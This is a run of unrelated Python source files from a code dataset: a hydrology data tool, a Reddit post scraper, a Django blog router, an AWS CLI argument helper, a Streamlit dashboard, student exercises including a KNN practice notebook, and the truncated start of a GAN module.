collapse_dict[metric_drop_yr].append(float_data_pt)\n except:\n if not metric in error_dict[comid]:\n error_dict[comid][metric]=[data_pt]\n else:\n error_dict[comid][metric].append(data_pt)\n else:\n for k in range(keycount-1):\n endstring=metric[-keylengths[k]:]\n #self.logger.critical(f'endstring:{endstring} for metric:{metric}')\n if endstring==mkeylist[k]:\n mkey=mkeylist[k]\n break\n if k==keycount-2:\n mkey='other'\n if not yr in metricdict[mkey]:\n metricdict[mkey][yr]={}\n metricdict[mkey][yr][metric]=data_pt\n \n if collapse:\n #many of these are just divided by 1\n outdict[comid]={metric:sum(val)/len(val) for metric,val in collapse_dict.items()}\n \n else:\n outdict[comid]=metricdict\n self.logger.exception(f'float error_dict:{error_dict}')\n return outdict\n except:\n self.logger.exception('streamcat error') \n \n def filterfailedcomids(self,comidlist):\n try:previously_failed_comids=self.anyNameDB(self.failed_SC_comid_path)['failed']\n except KeyError:\n self.logger.info(f'\"failed\" key not found in failed SC db')\n return comidlist\n except:\n assert False, 'unexpected error'\n comidlist=[comid for comid in comidlist if not comid in previously_failed_comids]\n return comidlist\n \n def addfailed(self,comidlist):\n with self.anyNameDB(self.failed_SC_comid_path) as db:\n try:previously_failed_comids=db['failed']\n except KeyError: previously_failed_comids={}\n except:assert False,'unexpected error'\n comiddict=dict.fromkeys([*previously_failed_comids.keys(),*comidlist])\n db['failed']=comiddict#just a dict for fast searching\n db.commit()\n return\n \n \n \n def pullStreamCatForComidList(self,comidlist,meta=0,error_lookup=0,add_huc12=1):\n try:self.rvrs_huc12comiddict\n except: self.reverse_huc12comid()\n comidlist=self.filterfailedcomids(comidlist)\n if len(comidlist)==0:\n self.logger.info(f'geogtool has only previously failed comids. 
returning empty dict')\n return {}\n #try: self.huchuc\n #except:self.build_huchuc()\n pathlist=[path for path in os.listdir(self.sc_data_dir) if path[-5:]=='.json']\n SCoutdict={}\n assert type(comidlist) is list, f'expecting list got {type(comidlist)}'\n comiddict={}\n huc12list=[]\n \"\"\"if type(comidlist[0]) is str:\n self.logger.debug(f'converting comids from string to int')\n comidlist=[int(comid) for comid in comidlist]\"\"\"\n failed_comids=[]\n new_comidlist=[]\n huc8dict={}\n for comid in comidlist:\n try:\n huc8=self.rvrs_huc12comiddict[comid][:8]\n if not huc8 in huc8dict:\n huc8dict[huc8]=[comid]\n else:\n huc8dict[huc8].append(comid)\n except:\n failed_comids.append(comid)\n self.logger.warning(f'no huc12 for comid:{comid}')\n \n huc8_errordict={} \n found=0\n fail=0\n for huc8,comids in huc8dict.items():\n huc8_errordict[huc8]=[]\n path=self.pathfromhuc8(huc8) # no group by for faster load\n if meta: path=path[:-5]+'_meta.json'\n try:\n huc8scdata=self.openjson(path)\n for comid in comids:\n #self.logger.info(f'comid:{comid}')\n comiddata=None\n try:\n comiddata=huc8scdata[int(comid)] # streamcat is not yet a string comid in the data\n except KeyError:\n try:\n\n comiddata=huc8scdata[comid]\n \n except KeyError:\n\n self.logger.info(f'could not find streamcat as str or int for huc8:{huc8},comid:{comid}')#,huc8scdata:{huc8scdata}')\n if error_lookup:\n \n message=self.checkNHDPlus(comid)\n self.logger.critical(message) \n except:\n assert False, 'halt, unexpected error'\n except:\n assert False, 'halt, unexpected error'\n if not comiddata is None:\n found+=1\n self.logger.info(f'streamcat data found for comid:{comid}')\n if add_huc12:\n comiddata['HUC12']=self.rvrs_huc12comiddict[comid]\n comiddict[comid]=comiddata # comid as a string\n else:\n failed_comids.append(comid)\n huc8_errordict[huc8].append(comid)\n fail+=1\n except: \n self.logger.exception(f'Streamcat problem for huc8:{huc8}')\n self.addfailed(failed_comids)\n self.logger.info(f'huc8_errordict:{huc8_errordict}')\n self.logger.info(f'counts for found:{found} and fail:{fail}')\n return comiddict\n \n\n def pathfromhuc8(self,huc8):\n try:\n self.pathtool\n except:\n import streamcat_unzip_tool as sct\n self.pathtool=sct.SCDataTool(sc_data_dir=self.sc_data_dir,groupby_huc8=0).makeSCHucSavePath\n return self.pathtool(huc8)\n \n \n def gethuc12comiddict(self):\n try: \n huc12comiddict=self.huc12comiddict\n return huc12comiddict\n except AttributeError:\n self.logger.info('huc12comiddict not in memory, building...')\n except:\n self.logger.exception(f'unexpected error getting huc12comiddict')\n assert False, 'unexpected error!'\n try: \n huc12comiddict_path=self.huc12comiddict_path\n self.huc12comiddict=self.anyNameDB(huc12comiddict_path)\n self.logger.info(f'opening {self.huc12comiddict_path} with length:{len(self.huc12comiddict)} and type:{type(self.huc12comiddict)}')\n except: \n self.logger.exception(f\"{self.huc12comiddict_path} exists but could not open, rebuilding\")\n self.buildNHDplus()\n \n return self.huc12comiddict\n \n \n def selectRandComidByHuc(self, comid_count=10000, huc2list=None, huc8count=None, huc8list=None, seed=0, evenshare=1):\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n try:\n huchuc=self.huchuc\n except:\n try:\n huchuc=self.anyNameDB(self.NHDhuchuc_path)\n except:\n huchuc=self.build_huchuc()\n huc2_huc8dict=huchuc['huc2_huc8dict']\n huc8_huc12dict=huchuc['huc8_huc12dict'] \n \n if huc2list is None: \n huc2list=[huc2 for huc2 in huc2_huc8dict if huc2 !='No']\n \n \n 
huc2count=len(huc2list)\n if huc8list is None:\n if huc8count is None: huc8count=500\n \n huc2_huc8count=max([1,int(huc8count/huc2count)])\n huc8count=huc2_huc8count*len(huc2list)\n if evenshare:\n huc2huc8comid_dict={}\n for huc2 in huc2list:\n huc2huc8comid_dict[huc2]={}\n huc8list=self.select_random_huc8(count=huc2_huc8count, huc2list=[huc2],seed=seed, evenshare=evenshare)\n huc8comidcount=max([1,int(comid_count/(huc2count*len(huc8list)))])\n huc8comidselect=[]\n for huc8 in huc8list:\n \n huc8comidlist=[]\n huc12list=huc8_huc12dict[huc8]\n for huc12 in huc12list:\n huc8comidlist.extend(self.huc12comiddict[huc12])\n shuffle(huc8comidlist)\n huc8comidselect.extend(huc8comidlist[:huc8comidcount]) \n huc2huc8comid_dict[huc2][huc8]=huc8comidselect\n return huc2huc8comid_dict\n \n else:\n huc8list=self.select_random_huc8(count=huc8count, huc2list=huc2list,seed=seed, evenshare=evenshare)\n for huc8 in huc8list:\n assert False, 'not developed'\n \n huc2comidselectdict={huc2:[] for huc2 in huc2list}\n huc2_comidcount=max([1,int(count/len(huc2list))])\n if evenshare:\n for huc2 in huc2list:\n huc2_huc8list=[]\n #huc2_huc8count=\n huc8_comidcount=max([1,huc2_comidcount/huc2_huc8count])\n \n \n \n \n \n \n def select_random_huc8(self,count=2,huc2list=None,seed=0,evenshare=1):\n if not seed is None:\n np.random.seed(seed)\n try:\n huchuc=self.huchuc\n except:\n huchuc=self.build_huchuc()\n huc2_huc8dict=huchuc['huc2_huc8dict']\n huc8_huc12dict=huchuc['huc8_huc12dict']\n huc2_huc8dict_select={}\n huc8_huc12dict_select={}\n \n if huc2list is None:\n huc2list=[huc2 for huc2 in huc2_huc8dict]\n else:\n for huc2,huc8list in huc2_huc8dict.items():\n if huc2 in huc2list:\n huc2_huc8dict_select[huc2]=huc8list\n for huc8 in huc8list:\n huc8_huc12dict_select[huc8]=huc8_huc12dict[huc8]\n huc2_huc8dict=huc2_huc8dict_select\n huc8_huc12dict=huc8_huc12dict_select\n \n if evenshare:\n huc2_huc8count=max([1,int(count/len(huc2list))]) # at least 1\n huc8_selection=[]\n for huc2 in huc2list:\n huc8list=huc2_huc8dict[huc2]\n shuffle(huc8list)\n huc8_selection.extend(huc8list[:huc2_huc8count])\n else:\n huc8list=[huc8 for huc8 in huc8_huc12dict]\n shuffle(huc8list)\n huc8_selection=huc8list[:count]\n \n huc8_huc12dict_finalselect={}\n \n for huc8 in huc8_selection:\n huc8_huc12dict_finalselect[huc8]=huc8_huc12dict[huc8]\n return huc8_huc12dict_finalselect\n \n \n \n def reverse_huc12comid(self):\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n \n self.rvrs_huc12comiddict={comid:huc12 for huc12,comidlist in self.huc12comiddict.items() for comid in comidlist }\n \n \n \n def build_huchuc(self):\n try:\n self.huchuc=self.anyNameDB(self.NHDhuchuc_path)\n if len(self.huchuc)==2:\n return self.huchuc\n else: self.logger.info(f'rebuilding huchuc')\n except: pass\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n huc2_huc8dict={}\n huc8_huc12dict={}\n \n for huc12 in self.huc12comiddict:\n a_huc8=huc12[0:8]\n a_huc2=huc12[0:2]\n try: \n huc8_huc12dict[a_huc8].append(huc12)\n except KeyError: # if huc8 is new\n huc8_huc12dict[a_huc8]=[huc12]\n try: # iff huc8 is new, add it to huc2 list\n huc2_huc8dict[a_huc2].append(a_huc8)\n except KeyError: # iff huc2 is new, create new dict entry for it too.\n huc2_huc8dict[a_huc2]=[a_huc8]\n except:\n self.logger.exception(f'unexpected error with huc12:{huc12}, a_huc8:{a_huc8}, a_huc2:{a_huc2}')\n except:\n self.logger.exception(f'unexpected error with huc12:{huc12}, a_huc8:{a_huc8}, a_huc2:{a_huc2}')\n 
huchuc={'huc2_huc8dict':huc2_huc8dict,'huc8_huc12dict':huc8_huc12dict}\n self.addtoDB(huchuc,self.NHDhuchuc_path)\n self.huchuc=huchuc\n return huchuc\n \n \n def checkNHDPlus(self,comid):\n try: self.NHDplus\n except: self.buildNHDplus(setNHDplus_attribute=1)\n message=f'checking NHDplus for comid:{comid}. '\n comidlist=self.NHDplus['COMID'].to_list()\n #huc12list=self.NHDplus['HUC12'].to_list()\n #huc8list=[huc12[0:8] for huc12 in huc12list]\n try:\n comid_data=self.NHDplus.iloc[comidlist.index(comid)]\n \n except ValueError:\n comid_data='comid not found'\n except:\n self.logger.exception('unexpected error')\n assert False, 'halt'\n message+=f'comid_data:{comid_data}'\n return message\n \n \n def buildNHDplus(self,setNHDplus_attribute=0):\n \n savefilename=self.NHDplus_path\n if os.path.exists(savefilename):\n try: \n NHDplus=self.anyNameDB(savefilename)['data']\n self.logger.info(f'opening {savefilename} with length:{len(NHDplus)} and type:{type(NHDplus)}')\n # self.logger.info(NHDplus)\n except: \n self.logger.info(f\"{savefilename} exists but could not open, rebuilding\")\n \n try: NHDplus\n except:\n filename=self.NHDdbf_path\n self.logger.info(f'starting read of {filename}')\n NHDplus=gpd.read_file(filename)\n self.logger.info('finished read of NHDplus')\n self.logger.info(f'opened {filename} with length:{len(NHDplus)} and type:{type(NHDplus)}')\n if os.path.exists(self.huc12comiddict_path):\n try: \n self.huc12comiddict=self.anyNameDB(self.huc12comiddict_path)\n assert len(self.huc12comiddict)>0,f'len huc12comiddict:{len(self.huc12comiddict)}'\n self.logger.info(f'opening {self.huc12comiddict_path} with length:{len(self.huc12comiddict)} and type:{type(self.huc12comiddict)}')\n # self.logger.info(self.huc12comiddict)\n if setNHDplus_attribute:\n self.NHDplus=NHDplus\n return \n except: \n self.logger.info(f\"{savefilename} exists but could not open, rebuilding\")\n\n self.logger.info(f'NHDplus.columns.values:{NHDplus.columns.values}')\n \n NHDplusHUC12array=NHDplus.loc[:,('HUC12')].to_numpy(dtype='str')\n self.logger.info('buildng huc12comiddict')\n huc12dict={}\n for comid_idx,huc12 in enumerate(NHDplusHUC12array):\n if len(huc12)==11:huc12='0'+huc12\n comid=NHDplus.loc[comid_idx,'COMID'].astype(str)\n if huc12 in huc12dict:\n huc12dict[huc12].append(comid)\n else: \n huc12dict[huc12]=[comid]\n self.addtoDB(huc12dict,self.huc12comiddict_path)\n self.addtoDB({'data':NHDplus},savefilename)\n self.huc12comiddict=huc12dict\n if setNHDplus_attribute:\n self.NHDplus=NHDplus\n return \n \n \n \n \n \n\n \n def getNHDplus(self,huc12):\n try: self.NHDplus\n except: self.buildNHDplus(setNHDplus_attribute=1)\n huc12dataframerows=self.NHDplus.loc[self.NHDplus['HUC12']==huc12]\n self.logger.info(f'type(huc12dataframerows):{type(huc12dataframerows)}')\n jsonfile=json.loads(huc12dataframerows.to_json())\n infodict={'NHDplusdata':jsonfile}\n return infodict\n \n \n \n \n \n \nif __name__==\"__main__\":\n gt=GeogTool()\n gt.buildNHDplus()\n huc12list=[key for key in gt.huc12comiddict]\n gt.logger.info(f'huc12list[0:10]:{huc12list[0:10]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[0]]:{gt.huc12comiddict[huc12list[0]]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[-1]]:{gt.huc12comiddict[huc12list[-1]]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[-1]]:{gt.huc12comiddict[\"030701010307\"]}')\n \n \n \n \n \n \n \n 
\n","repo_name":"DouglasPatton/kernelkernel","sub_path":"geogtools.py","file_name":"geogtools.py","file_ext":"py","file_size_in_byte":23628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33434816542","text":"import pandas as pd\n\nfilename = \"vacancies_by_year.csv\"\ndata1 = pd.read_csv(filename)\ndate = lambda date: int(date[:4])\ndata1[\"years\"] = data1[\"published_at\"].apply(date)\nyears_unique = list(data1[\"years\"].unique())\n\nfor year in years_unique:\n data2 = data1[data1[\"years\"] == year]\n data2.iloc[:, :6].to_csv(f\"chunks\\\\chunk_{year}.csv\", index=False)","repo_name":"denperi/Anfilofev","sub_path":"3.2.1.py","file_name":"3.2.1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16654416312","text":"# region Текст задания\n\n# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n\n# endregion\n\n# region Формирование массива\n\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 100\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]\n\n# endregion\n\n# инициализация переменных\nnumber_min = 0\nnumber_max = 0\n\n# цикл прохода массива и сравнения с болишм, меньшим числом\nfor item in range(len(array)):\n if array[item] > array[number_max]: # сравниваем числа в массиве,\n number_max = item # а сохраняем именно индекс, не само число\n elif array[item] < array[number_min]:\n number_min = item\n\n# вывод результата\nprint(f'Массив до изменеия\\n{array}')\narray[number_min], array[number_max] = array[number_max], array[number_min]\nprint(f'Массив после перестановки\\n{array}')\n\n","repo_name":"dmitriyVasilievich1986/home-work","sub_path":"Algorithm/Lesson_03/lesson_3-3.py","file_name":"lesson_3-3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33589876044","text":"import praw\nimport urllib.request\nfrom datetime import datetime\nfrom time import sleep\nimport json\n\ndef get_reddit(credfile = 'reddit_credentials.json'):\n '''\n Initiate the connexion to Reddit API by using the reddit_credentials\n stored in credfile (json file).\n Credentials should be stored as:\n {\"client_id\":\"XX1234XXX\",\n \"client_secret\":\"xxx1234xxx\",\n \"user_agent\":\"linux:xxx (by /u/xxx)\"}\n '''\n with open(credfile) as json_data:\n cred = json.load(json_data)\n reddit = praw.Reddit(client_id= cred['client_id'],\n client_secret= cred ['client_secret'],\n user_agent= cred['user_agent'])\n return reddit\n\ndef get_data(reddit=None,sub='all', maxposts=10):\n '''\n Extracts one datapoint consisting of maxposts posts, from the targeted sub.\n For each post, it extracts:\n -number of ups (=karma)\n -number of Comments\n -thumbnail\n -age in minutes\n -title\n -subreddit where the post was posted (useful for r/all)\n In addition, the datapoint carries two metadata: timestamp of the record and targeted sub.\n '''\n if not reddit:\n reddit = get_reddit()\n\n limit_read = maxposts + 2 #read two more posts than asked, in case of stickies\n submissions = reddit.subreddit(sub).hot(limit=limit_read)\n thumbnailsfolder = 'thumbnails/'\n data = {\n 'ups':[],\n 'coms':[],\n 'thumbs':[],\n 'ages':[],\n 'titles':[],\n 'subs':[]\n }\n\n for submission in submissions:\n if not submission.stickied:\n data['ups'].append(submission.ups)\n data['coms'].append(submission.num_comments)\n 
data['titles'].append(submission.title)\n age = datetime.now() - datetime.fromtimestamp(submission.created_utc)\n age = divmod(age.total_seconds(), 60)[0] #age is in minutes\n data['ages'].append(age)\n try : #some posts dont have previews. Use _nopreview.png as backup.\n image_name = thumbnailsfolder + submission.name + '.jpg'\n image_url = submission.preview['images'][0]['resolutions'][0]['url']\n urllib.request.urlretrieve(image_url, image_name)\n except AttributeError:\n image_name = '_nopreview.png'\n data['thumbs'].append(image_name)\n data['subs'].append(submission.subreddit_name_prefixed) #useful for r/all\n\n #keep only maxposts nbr of posts, so remove the stickies if any\n for d in data:\n data[d] = data[d][:maxposts]\n\n data['timestamp'] = datetime.now().strftime(\"%b %d %Y %H:%M:%S\")\n data['sub'] = sub\n return data\n\ndef collect_data(sub='all',maxposts=10,interval_sec=30,duration_min=10,feedback=True,savefile=None):\n '''\n This module repeats the get_data function during the duration_min in minutes, at every interval_sec in seconds.\n feedback = True will print out a progress information.\n savefile must be a json file name to dump the data in. Data is dumped at each loop.\n Returns data_collec, a list of data from get_data.\n '''\n #TODO: Clear plot folder\n size = round((duration_min*60)/interval_sec)\n reddit = get_reddit()\n data_collec = []\n for n in range(size):\n data = get_data(reddit,sub,maxposts)\n data_collec.append(data)\n if feedback:\n print('{}/{} snapshot recorded on {}'.format(n+1,size,data['timestamp']))\n if savefile:\n with open(savefile, 'w') as f:\n json.dump(data_collec, f)\n if n!=size-1: #dont sleep if it's the last extract\n sleep(interval_sec)\n return data_collec\n\ndef offset_timestamp(data,delta_hours):\n '''\n Add (or remove if negative) delta_hours hours to data['timestamp'].\n Useful if your extract timestamp is not in the viewer excepted local time.\n Return one data point.\n '''\n from datetime import timedelta\n timestamp = datetime.strptime(data['timestamp'],\"%b %d %Y %H:%M:%S\")\n timestamp = timestamp + timedelta(hours=delta_hours)\n data['timestamp'] = timestamp.strftime(\"%b %d %Y %H:%M:%S\")\n return data\n\nif __name__ == '__main__':\n pass\n","repo_name":"1-Sisyphe/reddit-hot-recorder","sub_path":"hotcollect.py","file_name":"hotcollect.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"79"} +{"seq_id":"243323422","text":"#created in part2\nfrom django.urls import path\nfrom .views import (\n PostListView,\n PostDetailView,\n PostCreateView,\n PostUpdateView,\n PostDeleteView,\n UserPostListView\n )\nfrom . 
import views #this imports something from current directory, that is views.py that we just made\n\n\nurlpatterns = [\n #dont need any path, because this is for all blog sites\n #path('', views.home, name='blog-home'), #sends it to views.home where views is the thing we imported\n path('', PostListView.as_view(), name='blog-home'),\n path('user/', UserPostListView.as_view(), name='user-posts'),\n path('post//', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post//update/', PostUpdateView.as_view(), name='post-update'),\n path('post//delete/', PostDeleteView.as_view(), name='post-delete'),\n path('about/', views.about, name='blog-about'), #handles blog/about\n]\n\n\n# /_.html\n# \tblog/post_list.html\n","repo_name":"seanmac11741/Sheendjangoblog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15987194021","text":"import copy\n\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom awscli.arguments import CustomArgument, CLIArgument\n\n\n@dataclass\nclass ArgumentParameters:\n name: str\n member: Optional[str] = None\n help_text: Optional[str] = None\n required: Optional[bool] = False\n\n\nclass InjectingArgument(CustomArgument):\n def __init__(self, serialized_name, original_member_name, **kwargs):\n self._serialized_name = serialized_name\n self._original_member_name = original_member_name\n super().__init__(**kwargs)\n\n def add_to_params(self, parameters, value):\n if value is None:\n pass\n wrapped_value = {self._original_member_name: value}\n if parameters.get(self._serialized_name):\n parameters[self._serialized_name].update(wrapped_value)\n else:\n parameters[self._serialized_name] = wrapped_value\n\n\nclass OriginalArgument(CLIArgument):\n def __init__(self, original_member_name, error_message, **kwargs):\n self._serialized_name = kwargs.get(\"serialized_name\")\n self._original_member_name = original_member_name\n self._error_message = error_message\n super().__init__(**kwargs)\n\n def add_to_params(self, parameters, value):\n if value is None:\n return\n\n unpacked = self._unpack_argument(value)\n if self._original_member_name in unpacked and self._error_message:\n raise ValueError(self._error_message)\n\n if parameters.get(self._serialized_name):\n parameters[self._serialized_name].update(unpacked)\n else:\n parameters[self._serialized_name] = unpacked\n\n\nclass BinaryBlobArgumentHoister:\n def __init__(\n self,\n new_argument: ArgumentParameters,\n original_argument: ArgumentParameters,\n error_if_original_used: Optional[str] = None,\n ):\n self._new_argument = new_argument\n self._original_argument = original_argument\n self._error_message = error_if_original_used\n\n def __call__(self, session, argument_table, **kwargs):\n argument = argument_table[self._original_argument.name]\n model = copy.deepcopy(argument.argument_model)\n del model.members[self._original_argument.member]\n\n argument_table[self._new_argument.name] = InjectingArgument(\n argument._serialized_name,\n self._original_argument.member,\n name=self._new_argument.name,\n help_text=self._new_argument.help_text,\n cli_type_name=\"blob\",\n required=self._new_argument.required,\n )\n argument_table[self._original_argument.name] = OriginalArgument(\n self._original_argument.member,\n self._error_message,\n name=self._original_argument.name,\n argument_model=model,\n 
operation_model=argument._operation_model,\n is_required=self._original_argument.required,\n event_emitter=session.get_component(\"event_emitter\"),\n serialized_name=argument._serialized_name,\n )\n","repo_name":"aws/aws-cli","sub_path":"awscli/customizations/binaryhoist.py","file_name":"binaryhoist.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"} +{"seq_id":"37318396274","text":"from tkinter import *\n\napp = Tk()\nresult = 0\n\n\ndef setTextInput(input_elem, result):\n input_elem.delete(0, \"end\")\n input_elem.insert(0, result)\n\n\ndef convertKmToMile():\n global result\n result = float(inputKM.get()) * 0.609344\n setTextInput(inputMile, result)\n\n\ndef convertMileToKm():\n global result\n result = float(inputMile.get()) * 1.609344\n setTextInput(inputKM, result)\n\n\ninputDirKM = StringVar(None)\ninputKM = Entry(app, textvariable=inputDirKM, width=30)\ninputKM.grid(row=1, column=1)\n\nlabelTextKM = StringVar()\nlabelTextKM.set('Km')\nlabelDirKM = Label(app, textvariable=labelTextKM)\nlabelDirKM.grid(row=1, column=2)\n\n\ninputDirMile = StringVar(None)\ninputMile = Entry(app, textvariable=inputDirMile, width=30)\ninputMile.grid(row=1, column=3)\n\nlabelTextMile = StringVar()\nlabelTextMile.set(\"Mile\")\nlabelDirMile = Label(app, textvariable=labelTextMile)\nlabelDirMile.grid(row=1, column=4)\n\nkm = Button(app, text=\"Km -> Mile\", command=convertKmToMile)\nmile = Button(app, text=\"Km <- Mile\", command=convertMileToKm)\n\nkm.grid(row=2, column=1)\nmile.grid(row=2, column=3)\n\napp.mainloop()\n","repo_name":"jos50275266/Python_Assignment","sub_path":"Homework_9/homework_9_3.py","file_name":"homework_9_3.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35981127430","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 4.1 NumPy ndarray : 다차원 배열 객체\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# # 4.1.3 nd array 생성\n\n# In[2]:\n\n\ndata1=[6,7.5,8,0,1]\n\n\n# In[3]:\n\n\narr1 = np.array(data1)\n\n\n# In[4]:\n\n\narr1\n\n\n# In[6]:\n\n\ntype(arr1)\n\n\n# In[7]:\n\n\ntype(data1)\n\n\n# In[8]:\n\n\ndata2=[[1,2,3,4],[5,6,7,8]]\n\n\n# In[14]:\n\n\n# ㅣ = 리스트, n = npararray\n\n\n# In[9]:\n\n\nl = [[1,2,3],[4,5,6]]\nl2 = [[1,2,3],[4,5,6]]\nn = np.array(l)\nn2 = np.array(l)\n\n\n# In[10]:\n\n\nprint(l)\nprint(n)\n\n\n# In[11]:\n\n\nprint(n + n2)\n\n\n# In[12]:\n\n\nprint(n*2)\n\n\n# In[13]:\n\n\nprint(l*2)\n\n\n# In[15]:\n\n\nimport numpy as np\n\n\n# In[16]:\n\n\nr = [4,2,1]\nb = [5,1,0]\n\n\n# In[18]:\n\n\nr1 = np.array(r)\nb1 = np.array(b)\n\n\n# In[21]:\n\n\nprint(r)\nprint(b)\n\nprint(r1)\nprint(b1)\n\n\n# In[44]:\n\n\nsamples = np.random.normal(size=(8,3))\n\n\n# In[45]:\n\n\nprint(samples)\n\n\n# # ※ KNN 실습\n\n# In[25]:\n\n\nimport matplotlib.pyplot as pit\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[76]:\n\n\npit.plot([1,2,3,4],[1,2,3,4])\n\n\n# In[66]:\n\n\npit.plot(1,2,marker='o', linestyle='',color='red')\npit.plot(1,3,marker='o', linestyle='',color='red')\npit.plot(2,2,marker='o', linestyle='',color='blue')\n\n\n# In[65]:\n\n\npit.plot(samples, linestyle='')\n\n\n# # 내가 한 것\n\n# In[129]:\n\n\nfor i in range(0,50):\n sample1 = np.random.normal(1)\n sample2 = np.random.normal(1)\n \n if(i % 2 == 0):\n cir = 'red'\n else:\n cir = 'blue'\n \n pit.plot(sample1,sample2, marker = 'o', color = cir)\n\n\n# # 교수님 하신거\n\n# In[215]:\n\n\nimport random\n\n\n# In[216]:\n\n\nr = 
[] #여자 1\nb = [] #남자 2\nfor i in range(50):\n r.append([random.randint(40,70),random.randint(140,180),1])\n b.append([random.randint(60,90),random.randint(160,200),0])\n\n\n# In[214]:\n\n\nfor i in range(50):\n pit.plot(r[i][0], r[i][1], marker ='o', color = 'red')\n pit.plot(b[i][0], b[i][1], marker ='o', color = 'blue')\n \nnew = [55,170,1] # 여자\npit.plot(new[0],new[1],marker='x',color='black')\n\n\n# # 거리 구하는 함수\n\n# In[133]:\n\n\ndist = np.sqrt(\n pow((new[0]-r[0][0]),2)\n +pow((new[1]-r[0][1]),2) \n)\n\n\n# In[134]:\n\n\nprint(dist)\n\n\n# In[137]:\n\n\ndef distance(x,y):\n return int (np.sqrt(pow((x[0]-y[0]),2) +pow((x[1]-y[1]),2)))\n\n\n# In[139]:\n\n\ndistance (new, r[0])\n\n\n# In[142]:\n\n\nresult = []\nfor i in range(50):\n result.append([distance(new, r[i]), r[1][2]])\n result.append([distance(new, b[i]), b[1][2]])\n\n\n# In[152]:\n\n\nresult.sort()\nprint(result)\n\n\n# # 1. 키를 입력해주세요\n# \n# # 2. 몸무게를 입력해주세요\n# \n# # 3. K의 개수를 입력해주세요\n# \n# # #. 당신은 남자 혹은 여자입니다.\n\n# In[ ]:\n\n\n\n\n\n# In[235]:\n\n\ndef distance(x,y):\n #주 점 사이의 거리를 구하는 함수\n return np.sqrt(pow((x[0]-y[0]),2)+pow((x[1]-y[1]),2))\n\ndef knn(x,y,k):\n result = []\n cnt = 0\n for i in range(len(y)):\n result.append([distance(x,y[i]),y[1][2]])\n result.sort()\n for i in range(k):\n if(result[i][1]==1):\n cnt +=1\n if(cnt > (k/2)):\n print(\"당신은 여자입니다.\")\n else:\n print(\"당신은 남자입니다.\")\n\n\n# In[236]:\n\n\nweight = input(\"몸무게를 입력해주세요. \")\n\n\n# In[237]:\n\n\nheight = input(\"키를 입력해주세요. \")\n\n\n# In[238]:\n\n\nnum = input(\"k를 입력해주세요. \")\n\n\n# In[239]:\n\n\nnew = [int(weight), int(height)]\n\n\n# In[240]:\n\n\nknn(new, r+b, int(num))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ahnsugi/hh","sub_path":"옛날거/08-22.py","file_name":"08-22.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15708502022","text":"from re import L\nimport streamlit as st \nimport pandas as pd\nimport numpy as np\n# static\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n \n\nst.set_page_config(page_title=\"Dashboard\", page_icon=\"📊\")\n\nhide_streamlit_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\n\n \nst.markdown(\"## 4. All catergorical Faetures\")\n\n # load the data\ndf = pd.read_csv('./save_folder/tips.csv')\n\n# streamlit widgets and charts \ndata_types = df.dtypes\ncat_cols = tuple(data_types[data_types == 'object'].index)\n### \nwith st.container():\n # 1. include all categorical features (multiselect)\n # 2. bar, area, line (selectbox)\n # 3. 
stacked (radio)\n c1, c2 , c3 = st.columns(3)\n with c1:\n group_cols = st.multiselect('select the features',cat_cols,cat_cols[0])\n features_to_groupby = group_cols\n n_features = len(features_to_groupby)\n \n with c2:\n chart_type = st.selectbox('Select Chart type',\n ('bar','area','line'))\n \n with c3:\n stack_option = st.radio('Stacked',('Yes','No'))\n if stack_option == 'Yes':\n stacked = True\n else:\n stacked = False\n \n\n feature = ['total_bill']\n select_cols = feature+features_to_groupby\n avg_total_bill = df[select_cols].groupby(features_to_groupby).mean()\n if n_features >1:\n for i in range(n_features-1):\n avg_total_bill = avg_total_bill.unstack()\n \n avg_total_bill.fillna(0,inplace=True)\n \n # visual\n fig, ax = plt.subplots()\n avg_total_bill.plot(kind=chart_type,ax=ax,stacked=stacked)\n ax.legend(loc='center left',bbox_to_anchor=(1.0,0.5))\n ax.set_ylabel('Avg Total Bill')\n st.pyplot(fig)\n\n with st.expander('click here to display values'):\n st.dataframe(avg_total_bill)\n ","repo_name":"niranjanpansare/streamlit-dataVistualization","sub_path":"pages/6_📊_All_Catergorical_Features.py","file_name":"6_📊_All_Catergorical_Features.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39991457345","text":"\"\"\"module for auxillary networks\"\"\"\nimport functools\n\nimport torch\nfrom torch import nn\n\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass 